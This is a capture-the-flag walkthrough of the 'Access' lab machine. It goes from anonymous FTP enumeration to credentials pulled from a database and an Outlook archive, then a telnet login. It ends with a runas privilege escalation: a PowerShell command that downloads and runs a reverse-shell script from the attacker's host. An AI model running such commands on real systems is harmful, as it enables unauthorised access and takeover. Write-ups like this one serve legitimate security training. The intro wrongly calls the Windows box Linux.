Summary

Access is an easy Linux box that can be exploited by enumerating the FTP server and finding two useful files. After decrypting the backup.mdb you will find credentials that can be used to unzip an archive. This archive contains a .pst file which contains an email with credentials. These credentials were then used to authenticate to the Telnet Server. Privileges were escalated by abusing runas and obtaining an Administrative shell.
This is a manual walkthrough without using Metaploit


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.105.253

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5

Nmap showed that FTP is used and anonymous login is allowed. The FTP directory contained the following files:

08-23-18  08:16PM       DIR          Backups
	08-23-18  08:16PM              5652480 backup.mdb
08-24-18  09:00PM       DIR          Engineer
	08-24-18  12:16AM                10870 Access Control.zip

These were both downloaded with get. The zip file requires credentials so I checked the backup.mdb. This is a Microsoft Acess Database file. To gather information about this file you will hvae to install mdbtools:

sudo apt install mdbtools

mdb-tables backup.mdb

This will produce a lot of tables, so let’s filter for interesting ones with user in them:

mdb-tables backup.mdb | grep -i user

I checked the interesting ones and the following table contained creds:

mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Obtaining Credentials

None of these work to obtain an authenticated FTP session so it made sense to try and use them to unzip the file that was obtained earlier. This also makes sense since you have an engineer account and the .zip was in the engineer folder. To unzip, use:

7z x -paccess4u@security Access\ Control.zip

This will create a file named: Access Control.pst. Okay, so the .pst file is an outlook data file. Since I don’t have outlook on kali linux to import it, I used readpst to export it:

readpst Access\ Control.pst

You can now read the email message:

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John

Authenticated FTP Shell

Sweet, so we obtained a new account. Since the webserver does not contain any sort of login page and the credentials didn’t work with FTP, it made sense that the telnet port must be used for authentication. The following command was used to authenticate over telnet at port 23:

telnet 10.129.109.204 23
Trying 10.129.109.204...
Connected to 10.129.109.204.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

Great, you now have a lower privileged shell as the security user. From here you have access to the user.txt.


Privilege Escalation

You should always run this command to check if any credentials are stored:

cmdkey /list 

PS C:\Users\security> cmdkey /list 

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
    Type: Domain Password
    User: ACCESS\Administrator

Sweet, in this case there are. This allows for an easy privilege escalation since you can abuse runas to run executables as the respective user. Start your python webserver and run the following command:

runas /user:ACCESS\Administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.147/Invoke-PowerShellTcp.ps1')"

This will run the powershell command to invoke the powershell reverse shell. This will provide you with a new reverse shell as Administrator:

Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>PS C:\Windows\system32> 
PS C:\Windows\system32> whoami
access\administrator

Conclusion

I quite enjoyed this box, the path was very straightforward since the attack vectors were limited. This was a pretty easy box, hope you learned something and enjoyed the writeup!